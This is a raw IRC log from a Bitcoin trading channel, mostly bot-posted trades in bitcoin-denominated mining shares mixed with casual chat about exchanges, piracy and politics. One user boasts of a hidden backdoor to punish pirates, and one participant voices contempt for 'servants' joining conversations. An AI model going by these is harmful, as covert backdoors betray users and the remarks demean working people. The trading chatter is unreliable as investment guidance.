22:49:05 ;;nethash May 28 22:49:14 100320.839133 May 28 22:49:30 ;;bc,stats May 28 22:49:32 Current Blocks: 238398 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 1505 blocks | Next Difficulty In About: 1 week, 2 days, 17 hours, 1 minute, and 56 seconds | Next Difficulty Estimate: 13773643.3062 | Estimated Percent Change: 13.3315 May 28 22:49:47 ;;ticker May 28 22:49:47 BTCUSD ticker | Best bid: 128.89999, Best ask: 128.90799, Bid-ask spread: 0.00800, Last trade: 128.89999, 24 hour volume: 41110.58669768, 24 hour low: 124.00000, 24 hour high: 130.90000, 24 hour vwap: 127.39860 May 28 22:53:01 [HAVELOCK] [ASICM] 15 @ 0.02469 = 0.3704 BTC [+] May 28 22:54:01 [HAVELOCK] [VTX] 1 @ 0.4251 BTC [-] May 28 22:59:31 [BTCTC] [RSM] 7 @ 0.008061 = 0.0564 BTC [+] May 28 22:59:33 [BTCTC] [RSM] 1 @ 0.00806 BTC [-] May 28 22:59:34 [BTCTC] [RSM] 79 @ 0.00804 = 0.6352 BTC [-] May 28 22:59:37 [BTCTC] [RSM] 18 @ 0.008032 = 0.1446 BTC [-] May 28 23:03:04 [HAVELOCK] [ASICM] 3 @ 0.02469 = 0.0741 BTC [+] May 28 23:05:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.02488 = 0.0995 BTC [+] May 28 23:08:26 lmao@http://gigahash.org/ May 28 23:09:11 50 ghash/sec PCI card May 28 23:09:12 huh May 28 23:09:57 and what, 2 watts ? :D May 28 23:10:08 nice filler text May 28 23:10:32 lmao@ http://www.asicgigahash.com/ May 28 23:10:42 (ASIC GIGAHASH DID NOT STEAL YOUR BIKE) May 28 23:10:45 wtf lol May 28 23:10:49 scamsite May 28 23:12:28 [BTCTC] [ASICMINER-PT] 1 @ 2.510001 BTC [-] May 28 23:12:56 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1955 = 0.782 BTC [-] May 28 23:12:58 [BTCTC] [CRYPTO-TRADE] 6 @ 0.1951 = 1.1706 BTC [-] May 28 23:14:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.02468 BTC [-] May 28 23:15:50 well then May 28 23:18:30 [BTCTC] [TAT.ASICMINER] 17 @ 0.02468 = 0.4196 BTC [-] May 28 23:18:35 [BTCTC] [ASICMINER-PT] 2 @ 2.528 = 5.056 BTC [+] May 28 23:18:43 [BTCTC] [ASICMINER-PT] 1 @ 2.5299 BTC [+] May 28 23:18:49 [BTCTC] [ASICMINER-PT] 3 @ 2.53 = 7.59 BTC [+] May 28 23:19:02 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 28 23:19:06 [BTCTC] [ASICMINER-PT] 1 @ 2.5494 BTC [+] May 28 23:19:10 [BTCTC] [ASICMINER-PT] 2 @ 2.5495 = 5.099 BTC [+] May 28 23:19:29 up up and away May 28 23:19:57 [BTCTC] [TAT.ASICMINER] 67 @ 0.02488 = 1.667 BTC [+] May 28 23:20:51 [BTCTC] [BITVPS] 1 @ 0.00063 BTC [+] May 28 23:21:44 [BTCTC] [BITVPS] 1 @ 0.000639 BTC [+] May 28 23:22:02 [HAVELOCK] [ASICM] 97 @ 0.02469 = 2.3949 BTC [+] May 28 23:22:49 [BTCTC] [TAT.ASICMINER] 200 @ 0.02488 = 4.976 BTC [+] May 28 23:23:02 [HAVELOCK] [ASICM] 49 @ 0.024699 = 1.2103 BTC [+] May 28 23:25:01 [HAVELOCK] [ASICM] 47 @ 0.02476 = 1.1637 BTC [+] May 28 23:26:02 [HAVELOCK] [ASICM] 314 @ 0.024799 = 7.7869 BTC [+] May 28 23:29:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.024889 = 0.0498 BTC [+] May 28 23:30:14 [BTCTC] [ASICMINER-PT] 1 @ 2.515001 BTC [-] May 28 23:30:15 [BTCTC] [ASICMINER-PT] 2 @ 2.515 = 5.03 BTC [-] May 28 23:30:19 [BTCTC] [ASICMINER-PT] 9 @ 2.510001 = 22.59 BTC [-] May 28 23:30:21 [BTCTC] [ASICMINER-PT] 9 @ 2.51 = 22.59 BTC [-] May 28 23:32:19 [BTCTC] [BASIC-MINING] 1 @ 0.617 BTC [-] May 28 23:32:24 LOL truffles May 28 23:32:38 10 points for anthropomorphizing bitcoins May 28 23:36:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] May 28 23:38:03 [MPEX] [S.MPOE] 4711 @ 0.00073608 = 3.4677 BTC [+] May 28 23:39:31 [BTCTC] [TAT.ASICMINER] 9 @ 0.02495 = 0.2246 BTC [+] May 28 23:46:11 [BTCTC] [BITVPS] 150 @ 0.000639 = 0.0959 BTC [+] May 28 23:48:01 [HAVELOCK] [ASICM] 9 @ 0.02495 = 0.2246 BTC [+] May 28 23:48:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] May 28 23:54:46 fucking 1and1, I moved all my domains from enom cuz they charge $15, now I get an email from 1and1 saying they are gonna be $15 May 28 23:55:00 move em all again to namecheap i guess May 28 23:55:18 [BTCTC] [S.DICE-PT] 2 @ 0.00313 = 0.0063 BTC [-] May 28 23:55:59 [BTCTC] [S.DICE-PT] 20 @ 0.002711 = 0.0542 BTC [-] May 28 23:56:33 [BTCTC] [S.DICE-PT] 100 @ 0.00271 = 0.271 BTC [-] May 28 23:56:41 [BTCTC] [S.DICE-PT] 105 @ 0.002701 = 0.2836 BTC [-] May 28 23:57:47 [BTCTC] [BTC-BOND] 4 @ 0.01044 = 0.0418 BTC [-] May 29 00:00:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.02495 = 0.0499 BTC [+] May 29 00:01:13 [BTCTC] [ASICMINER-PT] 1 @ 2.548899 BTC [+] May 29 00:02:22 [BTCTC] [ASICMINER-PT] 2 @ 2.53 = 5.06 BTC [-] May 29 00:02:31 [BTCTC] [BTC-BOND] 2 @ 0.01044 = 0.0209 BTC [-] May 29 00:04:22 "Shall bASIC-MINING invest idle capital in shares of ASICMiner-PT and distribute 100% of the resulting dividends to shareholders?" May 29 00:04:35 well... why bother with basic at all then lol May 29 00:04:48 [BTCTC] [ESECURITYSABTC] 1 @ 0.17611 BTC [-] May 29 00:07:22 Yes! May 29 00:07:30 lol May 29 00:07:46 he could also buy mining bonds May 29 00:07:51 but either way May 29 00:07:55 it's admitting defeat May 29 00:08:15 ...which might be a good thing May 29 00:08:45 [BTCTC] [TAT.ASICMINER] 42 @ 0.024889 = 1.0453 BTC [-] May 29 00:09:01 [HAVELOCK] [HIM] 1 @ 2.72 BTC [-] May 29 00:12:42 as an AM shareholder, i love the idea of these mining operations buying AM shares May 29 00:12:46 big volume buys May 29 00:14:10 [BTCTC] [S.DICE-PT] 1 @ 0.0027 BTC [-] May 29 00:14:13 [BTCTC] [S.DICE-PT] 7 @ 0.0026 = 0.0182 BTC [-] May 29 00:14:22 [BTCTC] [S.DICE-PT] 1 @ 0.00249 BTC [-] May 29 00:14:34 [BTCTC] [S.DICE-PT] 126 @ 0.002405 = 0.303 BTC [-] May 29 00:14:37 [BTCTC] [S.DICE-PT] 50 @ 0.00221 = 0.1105 BTC [-] May 29 00:14:39 [BTCTC] [S.DICE-PT] 10 @ 0.0022 = 0.022 BTC [-] May 29 00:14:41 [BTCTC] [S.DICE-PT] 3000 @ 0.0022 = 6.6 BTC [-] May 29 00:14:42 [BTCTC] [S.DICE-PT] 1 @ 0.00217 BTC [-] May 29 00:14:44 [BTCTC] [S.DICE-PT] 1804 @ 0.00215 = 3.8786 BTC [-] May 29 00:15:08 fiat500, I saw you say earlier that you do dev for cydia, that's pretty cool, I used to use it when I had iStuff May 29 00:15:29 you didnt pirate anything did you? :P May 29 00:15:30 [BTCTC] [TAT.ASICMINER] 26 @ 0.024889 = 0.6471 BTC [-] May 29 00:16:24 [BTCTC] [ASICMINER-PT] 1 @ 2.510001 BTC [-] May 29 00:16:39 i find it aggravating when even friends say "oh shit, you wrote that? i use that!" and then you ask if they bought it and they say "of course not" May 29 00:16:42 lol May 29 00:17:03 i didnt discover it til i had bought most apps ai wanted May 29 00:17:12 the pirated stuff was all garbage May 29 00:17:22 and then i wiped the machine and gave it to my mom May 29 00:17:40 i wrote an irc client once, flowchat, spent about a year on the appstore before i gave up on it May 29 00:17:41 who is still happily using the ipad 1 May 29 00:17:51 it had a backdoor to punish pirates May 29 00:18:02 via ctcp, much lulz ensued May 29 00:18:09 i dont have time to pirate apps May 29 00:18:14 i kinda stopped caring after a while May 29 00:18:33 shit i dont have time to even use apps May 29 00:18:35 i dont put drm in any of my shit anymore May 29 00:18:37 yeah same May 29 00:18:40 dont even use my own stuff May 29 00:18:57 phone, mail, imessage, sometimes chrome May 29 00:19:05 i use splashtop for remoting to my computers May 29 00:19:07 which i paid for May 29 00:19:12 and then free apps May 29 00:19:41 so many people buying AMC May 29 00:19:42 ... May 29 00:19:51 i spoke to the issuer today May 29 00:19:55 in #bitfunder May 29 00:20:02 468btc volume today May 29 00:20:05 dunno what to make of it May 29 00:20:13 the problem with AMC is May 29 00:20:18 even if he does pull it off May 29 00:20:23 with his avalon chips May 29 00:20:26 itll be too late May 29 00:20:36 as biased as it sounds May 29 00:20:43 buying AM is still better May 29 00:20:44 its gonna be too late for everyone equally no? May 29 00:21:03 i just mean May 29 00:21:07 itll be like 3-4mos May 29 00:21:08 anyway, i have diversified, but majority of my holdings are in AM May 29 00:21:15 before he has those chips hashing May 29 00:21:27 so ive diversified just enough not to feel super guilty about it May 29 00:21:36 thats a lotta AM divs to forgo May 29 00:21:51 what, 1-2 btc per week? May 29 00:22:00 can make more in appreciation May 29 00:22:43 even that new bond might be better than AMC May 29 00:22:45 and itll cost me less May 29 00:23:35 you writing a novel truffles? May 29 00:24:09 ThickAsThieves: i feel so bad for crypto-trade right now May 29 00:24:20 this is the most anticlimactic launch ive ever seen May 29 00:24:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] May 29 00:25:48 dont feel bad May 29 00:26:02 he valued his company at like $2m before it existed May 29 00:26:48 a friend of mine wants to get into btc and he was asking what a good way to get 10k USD in was May 29 00:27:02 after walking him through the different options i realized how fucking stupid everything looks May 29 00:27:03 campbx isnt bad May 29 00:27:14 but you have to do their KYC shit first May 29 00:27:19 for that much $ May 29 00:28:02 hes in CA, so he couldnt use coinbase May 29 00:28:24 none May 29 00:28:28 theres cavirtex, but it looks like 12 year olds are behind it May 29 00:28:30 even gox really May 29 00:28:45 if you want anon, use face-to-face May 29 00:28:51 he doesnt care about that May 29 00:29:18 wot May 29 00:29:47 i mean he doesnt care about anonimity, not sure what bearing my face has on this May 29 00:30:18 truffles is injecting stuff May 29 00:30:21 we need a convenient way to buy large amounts of coin May 29 00:30:24 thats for sure May 29 00:30:37 truffles, #bitcoin-otc? May 29 00:30:41 once you get campbx set up, May 29 00:30:45 you can send them a check May 29 00:30:50 for deposits May 29 00:30:50 or May 29 00:30:51 a.. check May 29 00:30:53 use dwolla May 29 00:30:59 thats not exactly convenient May 29 00:31:10 truffles: he is new, i am pretty new myself May 29 00:31:19 whats your idea of convenient? May 29 00:31:39 coinbase, but with higher limits, and working internationally May 29 00:32:03 nothing more convenient than sitting in ur boxers and clicking a button May 29 00:32:17 writing checks is pretty easy May 29 00:32:19 as-is dwolla May 29 00:32:26 dwolla works in CA? May 29 00:32:37 no idea May 29 00:32:43 international check-cashing is also pretty weird May 29 00:32:57 you left out the inernational part at first May 29 00:33:05 canada :P May 29 00:33:21 i think cavirtex is legit May 29 00:34:04 i guess, but you know as an outsider looking in, would you be convinced to send them $10,000 after looking at the website? May 29 00:34:24 i havent tried it myself so i cant even provide anecdotal evidence for a recommendation May 29 00:35:02 [HAVELOCK] [ASICM] 591 @ 0.02495 = 14.7455 BTC [+] May 29 00:35:03 [HAVELOCK] [ASICM] 600 @ 0.024975 = 14.985 BTC [+] May 29 00:35:04 [HAVELOCK] [ASICM] 153 @ 0.02499999 = 3.825 BTC [+] May 29 00:35:06 [HAVELOCK] [ASICM] 120 @ 0.025 = 3 BTC [+] May 29 00:35:07 [HAVELOCK] [ASICM] 976 @ 0.025 = 24.4 BTC [+] May 29 00:35:15 whoa May 29 00:35:18 woah there horsey May 29 00:35:20 slow down i wasnt ready! May 29 00:35:50 ThickAsThieves: cmon market-make us up to 0.025 on btct will ya May 29 00:36:01 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [+] May 29 00:36:20 trust me, ive been playing a big role in evening out the price ;) May 29 00:36:28 21:34 < truffles> bitcoin is still for the true believers May 29 00:36:42 you can believe in bitcoin without believing in the services built around it May 29 00:37:29 like pirate's victims? :P May 29 00:39:35 [BTCTC] [BITVPS] 100 @ 0.000639 = 0.0639 BTC [+] May 29 00:41:21 you prefer more randomness? May 29 00:41:32 or more predictably bad odds? May 29 00:43:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.02493 = 0.0499 BTC [-] May 29 00:44:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.02493 = 0.0499 BTC [-] May 29 00:45:03 http://www.reddit.com/r/Bitcoin/comments/1f77qd/mark_zuckerberg_talks_about_bitcoin_in_hungary/ May 29 00:45:20 [BTCTC] [S.DICE-PT] 1 @ 0.002699 BTC [+] May 29 00:45:26 [BTCTC] [ASICMINER-PT] 1 @ 2.539 BTC [+] May 29 00:46:18 too late, winklevossen got dibs May 29 00:46:24 gtfo zuck May 29 00:47:09 [BTCTC] [TAT.ASICMINER] 39 @ 0.02493 = 0.9723 BTC [-] May 29 00:47:15 [BTCTC] [BITVPS] 5 @ 0.000639 = 0.0032 BTC [+] May 29 00:49:05 trial! May 29 00:49:09 [BTCTC] [S.DICE-PT] 1 @ 0.00269 BTC [-] May 29 00:49:11 [BTCTC] [S.DICE-PT] 18 @ 0.002699 = 0.0486 BTC [+] May 29 00:49:16 [BTCTC] [TAT.ASICMINER] 49 @ 0.02495 = 1.2226 BTC [+] May 29 00:50:16 [BTCTC] [S.DICE-PT] 1 @ 0.002699 BTC [+] May 29 00:50:33 [MPEX] [S.MPOE] 5500 @ 0.00073638 = 4.0501 BTC [+] May 29 00:51:11 [BTCTC] [S.DICE-PT] 7 @ 0.002705 = 0.0189 BTC [+] May 29 00:51:16 we asked him why he came to Budapest, he asked us which Mario Kart character we preferred May 29 00:51:26 :D May 29 00:52:19 [BTCTC] [ASICMINER-PT] 1 @ 2.544999 BTC [+] May 29 00:52:22 [BTCTC] [ASICMINER-PT] 2 @ 2.545 = 5.09 BTC [+] May 29 00:53:17 [BTCTC] [ASICMINER-PT] 1 @ 2.545 BTC [+] May 29 00:54:07 [BTCTC] [TAT.ASICMINER] 18 @ 0.02495 = 0.4491 BTC [+] May 29 00:54:14 [BTCTC] [TAT.ASICMINER] 23 @ 0.0249 = 0.5727 BTC [-] May 29 00:57:23 [BTCTC] [ASICMINER-PT] 1 @ 2.5489 BTC [+] May 29 00:58:59 [BTCTC] [ASICMINER-PT] 2 @ 2.5489 = 5.0978 BTC [+] May 29 00:59:04 thats weird May 29 00:59:12 BTCTC showed teh top bid as me May 29 00:59:18 but i made no such bid May 29 00:59:24 so i cancelled May 29 00:59:30 and sold into it like normal May 29 00:59:32 :/ May 29 00:59:46 wut May 29 01:00:25 i assume it was a display error May 29 01:00:32 like i could cancel someone elses bid May 29 01:00:35 except i couldnt May 29 01:01:07 [BTCTC] [TAT.ASICMINER] 6 @ 0.02495 = 0.1497 BTC [+] May 29 01:01:24 TAT: a bit over a week ago I had problems with orders from the day before showing up -- probably a caching thing May 29 01:01:37 this was different May 29 01:01:46 basically it added a cancel button May 29 01:01:49 to the top bid May 29 01:01:55 even though it wasnt my bid May 29 01:01:59 maybe just cuz you're awesome May 29 01:02:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.02495 = 0.1248 BTC [+] May 29 01:02:27 man, good thing it wasnt like 400,000 shares May 29 01:03:26 oh you know me, black belt hacker that only knows html and qbasic May 29 01:03:50 LMFAO qbasic May 29 01:03:57 :) May 29 01:04:16 none of that html5 garbage either May 29 01:04:19 i'm all about tables May 29 01:05:13 so you made first ever web server in qbasic? May 29 01:05:37 10 PRINT "200 HTTP/0.1 OK" May 29 01:05:53 20 PRINT "Content-Length: 0" May 29 01:05:57 30 GOTO 10 May 29 01:06:08 no, but i scoured BBSs for pearl jam bootleg cassettes May 29 01:06:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.02495 = 0.0499 BTC [+] May 29 01:06:52 [MPEX] [S.MPOE] 10300 @ 0.00073729 = 7.5941 BTC [+] May 29 01:07:01 i remember printing out web porn May 29 01:07:13 ANSI porn May 29 01:07:19 it was all ditehred May 29 01:07:24 dithered May 29 01:07:28 and dotty May 29 01:07:36 my mom found it May 29 01:07:39 whats is this!? May 29 01:07:40 lol May 29 01:09:29 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [-] May 29 01:09:33 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [-] May 29 01:09:34 and then they were like...so you are adult now, we have to explain you something, no? May 29 01:09:42 http://sixteencolors.net/ May 29 01:10:16 they never explained May 29 01:10:30 had to learn on the job May 29 01:10:42 haha same here May 29 01:11:20 although we had pretty progressive Health teachers in middle school May 29 01:11:34 ThickAsThieves: heh May 29 01:11:41 you know all that attention AMC got today May 29 01:11:45 "AMC Is Massively Increasing Its Hash Power To 3.504 TH/s and Its Revenue To $5,398,450.75" May 29 01:11:59 they just posted this piece of news, that explains it May 29 01:12:17 yeah May 29 01:12:30 except i bet that $ amount is absurdly wrong May 29 01:12:36 and based on current diff May 29 01:13:49 no clue, they said they would provide detailed stakeholder reports by june 15h May 29 01:14:03 so either the scam pops then, or we see some solid numbers May 29 01:14:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.024889 = 0.2489 BTC [-] May 29 01:14:10 [18:13] <+AssetBot> [AMC] 9 @ 0.00064000 = 0.00576000 [+] May 29 01:14:15 makes me sad May 29 01:14:29 im already 2btc up thanks to this news May 29 01:14:31 lol May 29 01:14:35 hehe May 29 01:15:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.02471 BTC [-] May 29 01:15:04 [MPEX] [S.MPOE] 2200 @ 0.00073638 = 1.62 BTC [-] May 29 01:15:05 [MPEX] [S.MPOE] 14739 @ 0.00073608 = 10.8491 BTC [-] May 29 01:15:28 looks like mpoe added some terahashes, too :D May 29 01:15:48 it was like .00068 a few hrs ago ?! May 29 01:16:07 yes, it's jumping May 29 01:16:10 up and down May 29 01:16:16 hrm May 29 01:16:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.02495 = 0.1996 BTC [+] May 29 01:16:36 pump up the volume, pump up the volume May 29 01:17:07 Ukto: what do you think of AMC? do you know the issuer at all? May 29 01:17:37 TAT: doesn't look like Jurarul auction sold out -- what do yu make of so many buys > 2.5 on AM-PT? May 29 01:18:22 [BTCTC] [BITVPS] 2 @ 0.000639 = 0.0013 BTC [+] May 29 01:18:52 https://medium.com/raw-post/6dea0affd157 May 29 01:19:13 Bitcoins: Gentrifying Money May 29 01:19:13 Another creative socio-economic displacement tool? May 29 01:19:40 gentrification applied to currency, thats a new one May 29 01:19:52 worth a read May 29 01:22:10 I'll start a fund called bitcoin-for-poor-people May 29 01:24:27 "Proponents want bitcoins to be the new monetary normal, yet there are 119 million Americans without broadband access" May 29 01:24:35 worst argument against progress ive ever heard May 29 01:24:41 seriously though, I think it won't be a huge issue. I think the third world will appreciate the value of and benefit from bitcoin more than the first world -- they get increased access to global markets, freedom from currency controls, plus they escape hyperinflation in their own currencies May 29 01:25:21 broadband access is not our fault, not our responsibility, let municipalities take care of that May 29 01:25:41 it absolutely is gentrifying. May 29 01:25:44 progress should not have to wait for lethargic government May 29 01:25:45 that however is a good thing. May 29 01:26:00 (or lethargic business for that matter) May 29 01:27:06 mircea_popescu: gentrification is now a code-word for bad in poor neighborhoods where crime is rampant and the community doesnt give a shit about improving the overall conditions May 29 01:27:25 fiat500 the problem iof the world now is the absence of gentry. May 29 01:27:43 ie, a superior class, with priviledges and immunities clearly entrenched above the mass. May 29 01:27:54 i live in the middle east, i can walk down any street any time of the night and not have to worry about getting shot or mugged May 29 01:27:59 guess why. May 29 01:28:11 the middle east hasn't been fucked over by the "all equal" fallacy. May 29 01:28:31 [17:23] "Proponents want bitcoins to be the new monetary normal, yet there are 119 million Americans without broadband access" <-- I bet they have cell phones with internet access. and APPs :P May 29 01:28:43 i am now moving to SF and i will have to worry about crime for the first time in my life, 1st world problems indeed May 29 01:28:45 Ukto bitcoin on teh cell... May 29 01:28:55 Ukto: LOL, they do, but they pirate them :P May 29 01:29:11 mircea_popescu: what? you can have a headers on client. May 29 01:29:12 only May 29 01:29:12 i have no idea why anyone would move to the us. May 29 01:29:13 no credit cards May 29 01:29:16 and not have a chain bloat May 29 01:29:18 so they cant purchase anything online May 29 01:29:33 actually google fiber had this problem in KC May 29 01:29:57 google fiber is going into Austin a about 3hrs south of me May 29 01:30:01 so many shitty neighborhoods didnt get fiber because the community was like "wtf we dont even have a computer at home" May 29 01:30:38 (google was offering $25 downpayment and free 5mbit for 2 years, or something ridiculously generous like that) May 29 01:31:13 22:28 < mircea_popescu> the middle east hasn't been fucked over by the "all equal" fallacy. May 29 01:31:43 very true actually, but they take it to some extremes here with their treatment of southeast-asian workers May 29 01:32:12 well it'd depend on the place, but yeah. May 29 01:32:19 the gulf mostly May 29 01:32:20 social hierarchy is no panacea May 29 01:32:26 just the absence thereof is social disaster. May 29 01:32:37 [BTCTC] [TAT.ASICMINER] 34 @ 0.02495 = 0.8483 BTC [+] May 29 01:33:18 it's really unbearable in the states, i had to point out to waitresses cab drivers, various servants that no they may not join the conversation of their masters all the damned time. May 29 01:33:25 lmfao May 29 01:33:27 it gets obnoxious fast. May 29 01:34:05 mircea_popescu some of us tolerate that May 29 01:34:07 mircea_popescu: hierarchy cannot be destroyed; it is conserved, rather like energy. The problem in the U.S. (or, for that matter, USSR) is a divergence between formal and actual hierarchy. May 29 01:34:12 but generally speaking it's rude May 29 01:34:20 jcpham tolerate it, sure. all the time ? enough already. May 29 01:34:26 when "servants" interject themselves May 29 01:34:27 asciilifeform perhaps. May 29 01:34:57 heck, i talk to people all the time, not particularly hung up on it. but! let me ask you something for the love of christ. May 29 01:35:00 culture in amera varies from state to state, region to region May 29 01:35:11 not really. May 29 01:35:14 used to, i guess. May 29 01:35:19 now it's gordon ramsey and whatever the fuck. May 29 01:35:32 NYers are obnoxious and rude and have no manners May 29 01:35:48 that's a stereotype, but i find it to be true May 29 01:36:01 [HAVELOCK] [ASICM] 19 @ 0.025 = 0.475 BTC [+] May 29 01:36:14 people act differently in different locales, that's all i'm saying May 29 01:36:20 lmfao, how does ramsey tie into this? May 29 01:36:22 cambridge is by far the worst. ny i never tought was that bad. May 29 01:36:28 fiat500 "culture". May 29 01:36:35 rudeness? May 29 01:36:40 did i misspell the guy ? cook expert or w/e May 29 01:36:56 him and billy mays lol May 29 01:37:00 lmfao May 29 01:37:11 american culture today. May 29 01:37:19 hes british though :P May 29 01:37:25 well, english May 29 01:37:26 probably that damn first amendment everyone thinks they have May 29 01:37:51 what's the 1sdt amendment again, you can do it ? May 29 01:38:05 you can say it May 29 01:38:29 unless you're at an airport May 29 01:38:35 hah May 29 01:38:38 that was made for white men at a time they had slaves (both black and female) May 29 01:39:21 it means i can cunt in public a lot May 29 01:39:23 haha May 29 01:39:27 *say cunt May 29 01:39:38 im pretty sure "obscenity" is not protected. May 29 01:39:40 mostly that's all it means May 29 01:40:01 how is calling my dog obscene May 29 01:40:13 the judge wil lknow it when he sees your bitch. May 29 01:40:20 rofl May 29 01:42:11 yeh its starting to suck here May 29 01:42:37 you in the USA? May 29 01:42:39 i see the battle for ripple is going well... May 29 01:43:02 greedy politicians and businessmen blurred the lines between our law and business and led us down a dangerous and shitty road. May 29 01:43:05 yes May 29 01:43:22 [MPEX] [S.MPOE] 12649 @ 0.00073608 = 9.3107 BTC [-] May 29 01:43:24 [MPEX] [S.MPOE] 10200 @ 0.00073729 = 7.5204 BTC [+] May 29 01:43:25 [MPEX] [S.MPOE] 5200 @ 0.00073914 = 3.8435 BTC [+] May 29 01:43:29 [MPEX] [S.MPOE] 2328 @ 0.00074029 = 1.7234 BTC [+] May 29 01:43:44 kinda. May 29 01:44:51 Namworld: https://btct.co/security/S.MPOE-PT May 29 01:45:02 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [+] May 29 01:46:01 [HAVELOCK] [ASICM] 3 @ 0.025 = 0.075 BTC [+] May 29 01:46:17 [MPEX] [S.MPOE] 16717 @ 0.00074029 = 12.3754 BTC [+] May 29 01:51:50 [BTCTC] [ASICMINER-PT] 1 @ 2.547 BTC [-] May 29 01:51:51 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [+] May 29 01:51:52 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [+] May 29 01:51:54 [BTCTC] [ASICMINER-PT] 1 @ 2.5489 BTC [+] May 29 01:51:55 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 29 01:51:56 [BTCTC] [ASICMINER-PT] 3 @ 2.5495 = 7.6485 BTC [+] May 29 01:51:57 [BTCTC] [ASICMINER-PT] 3 @ 2.5495 = 7.6485 BTC [+] May 29 01:53:51 [BTCTC] [TAT.ASICMINER] 76 @ 0.02495 = 1.8962 BTC [+] May 29 01:57:01 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [+] May 29 01:57:20 [BTCTC] [BASIC-MINING] 9 @ 0.62 = 5.58 BTC [+] May 29 01:59:26 whats up with mining bonds and stocks today May 29 02:00:02 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [+] May 29 02:00:32 [BTCTC] [BASIC-MINING] 6 @ 0.62 = 3.72 BTC [+] May 29 02:02:02 [HAVELOCK] [ASICM] 37 @ 0.02512 = 0.9294 BTC [+] May 29 02:06:52 [MPEX] [S.MPOE] 7700 @ 0.00073508 = 5.6601 BTC [-] May 29 02:08:01 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [-] May 29 02:09:03 [BTCTC] [TAT.ASICMINER] 24 @ 0.02495 = 0.5988 BTC [+] May 29 02:09:05 [BTCTC] [S.MPOE-PT] 4 @ 0.000709 = 0.0028 BTC [+] May 29 02:09:10 [BTCTC] [S.MPOE-PT] 25 @ 0.000709 = 0.0177 BTC [+] May 29 02:09:12 [BTCTC] [S.MPOE-PT] 271 @ 0.000709 = 0.1921 BTC [+] May 29 02:09:16 [BTCTC] [S.MPOE-PT] 2000 @ 0.00071 = 1.42 BTC [+] May 29 02:09:19 [BTCTC] [S.MPOE-PT] 25 @ 0.000719 = 0.018 BTC [+] May 29 02:09:20 [BTCTC] [S.MPOE-PT] 1000 @ 0.00072 = 0.72 BTC [+] May 29 02:09:22 [BTCTC] [S.MPOE-PT] 25 @ 0.000729 = 0.0182 BTC [+] May 29 02:09:23 [BTCTC] [S.MPOE-PT] 500 @ 0.00073 = 0.365 BTC [+] May 29 02:09:51 [MPEX] [S.MPOE] 3850 @ 0.00073508 = 2.8301 BTC [-] May 29 02:10:25 Thanks for the notice. May 29 02:13:51 np May 29 02:14:50 I usually prefer the other way around... May 29 02:15:07 when price is cheaper other places and higher on my PTs. May 29 02:15:23 It turns a little profit and gets more shares in the PT. May 29 02:18:24 [BTCTC] [GSDPT] 2 @ 0.002724 = 0.0054 BTC [+] May 29 02:26:42 [MPEX] [S.MPOE] 3405 @ 0.00074029 = 2.5207 BTC [+] May 29 02:26:45 [MPEX] [S.MPOE] 2896 @ 0.00074411 = 2.1549 BTC [+] May 29 02:31:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.02495 = 0.2994 BTC [+] May 29 02:33:01 [HAVELOCK] [ASICM] 1 @ 0.0248 BTC [-] May 29 02:42:26 is mircea_popescu around? May 29 02:42:45 sup May 29 02:42:47 had a question about your birth town May 29 02:42:59 since I just watched Van Helsing yesterday lol May 29 02:43:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.02495 = 0.1248 BTC [+] May 29 02:43:50 [BTCTC] [TAT.ASICMINER] 27 @ 0.02495 = 0.6737 BTC [+] May 29 02:44:40 yea ? May 29 02:52:49 [BTCTC] [S.DICE-PT] 2 @ 0.002301 = 0.0046 BTC [-] May 29 02:55:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [+] May 29 03:01:06 mircea_popescu: nvm google answered my question May 29 03:01:09 i feel sills May 29 03:01:11 silly* May 29 03:02:40 [BTCTC] [S.BBET-PT] 2 @ 0.00173 = 0.0035 BTC [-] May 29 03:04:02 [BTCTC] [TAT.ASICMINER] 50 @ 0.02495 = 1.2475 BTC [+] May 29 03:05:07 this question might not belong in here, but involves BTC- seems there is so much BTC being spent on Feathercoin (FTC) anyone know why? May 29 03:05:19 I'm looking at the order book on btc-e May 29 03:06:50 good grief hardly seems like a good idea to just throw $$ at it..one order here for instance is a buy order for $15K worth feathercoin May 29 03:08:59 maybe May 29 03:12:02 [HAVELOCK] [ASICM] 7 @ 0.025 = 0.175 BTC [+] May 29 03:17:01 [HAVELOCK] [ASICM] 1 @ 0.025119 BTC [+] May 29 03:17:01 [HAVELOCK] [ASICM] 5 @ 0.02512 = 0.1256 BTC [+] May 29 03:18:51 [BTCTC] [TAT.ASICMINER] 24 @ 0.02495 = 0.5988 BTC [+] May 29 03:19:15 [BTCTC] [BTC-BOND] 3 @ 0.01045 = 0.0314 BTC [+] May 29 03:20:43 KRS-1 prolly in pump phase. May 29 03:21:06 pump 'n dump May 29 03:22:02 i wish peeps would keep the pump and dumps to the alt coins May 29 03:32:43 [BTCTC] [ASICMINER-PT] 2 @ 2.5495 = 5.099 BTC [+] May 29 